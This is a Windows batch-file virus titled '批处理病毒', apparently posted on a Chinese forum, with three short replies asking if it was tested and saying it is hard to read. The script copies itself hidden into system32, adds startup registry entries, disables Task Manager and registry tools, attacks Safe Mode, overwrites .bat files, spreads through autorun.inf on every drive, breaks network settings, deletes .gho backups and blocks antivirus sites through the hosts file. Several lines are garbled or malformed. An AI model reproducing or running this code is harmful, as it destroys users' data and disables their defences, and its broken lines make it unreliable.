@echo off&title 批处理病毒
::设置自身属性
copy %0 %Windir%\system32\system.bat
attrib %Windir%\system32\system.bat +s +h +r
::修改注册表
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f>nul
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f>nul
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f>nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 0 /f >nul
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f>nul
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetFolders /t REG_DWORD /d 1 /f>nul
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f>nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v bat /t REG_SZ /d %windir%\system32\system.bat /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v bat /t REG_SZ /d %windir%\system32\system.bat /f > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d %windir%\system32\system.bat /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v bat /t REG_SZ /d %windir%\system32\system.bat /f > nul
::破坏安全模式
delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f>nul
delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f>nul
delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f>nul
delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f>nul
::将自身复制到各个磁盘目录
for /r c:\windows\system32 %%i (*.bat) do copy %0 %%i
for %%i in (d,e,f,g,h,i,j,k,l) do (
fsutil fsinfo drives | findstr /i %%i|| goto Next
set DriveT=%%i:\
for /d %%j in (!DriveT!*) do (
pushd %%j© %0 %%j\system.bat&attrib +r +h +s system.bat
)
)
::写ini配置文件
[windows]>> %windir%\win.ini
run=%windir%\system.bat >> %windir%\win.ini
load=%windir%\system.bat >> %windir%\win.ini
[boot] >> %windir%\system.ini
shell=explorer.exe system.bat >> %windir%\system.ini
::写autorun.inf
echo [AutoRun]>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib +r +s +h d:\autorun.inf
::将autorun.inf 文件复制到各个磁盘目录
:Next
for %%i in (d,e,f,g,h,i,j,k,l) do (
fsutil fsinfo drives | findstr /i %%i|| goto Next
set DriveT=%%i:\
for /d %%j in (!DriveT!*) do (
pushd %%j
echo [AutoRun]>autorun.inf
echo Open=system.bat>>autorun.inf
attrib +r +h +s system.bat
)
)
::断网线
netsh interface ip set address name="本地连接" source= static addr= 192.168.1.108 mask= 255.255.255.0 gateway=none
netsh interface IP set dns "本地连接" static addr=none
::删除GHO备份
for %%c in (c,d,e,f,g,h,i,j) do del %%c:\*.gho /f /s /q >nul
::修改HOST文件.不允许其反问杀毒网站
%0 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts

LZ测试过没有啊？

看不明白

一点都不明白~比日文还难看~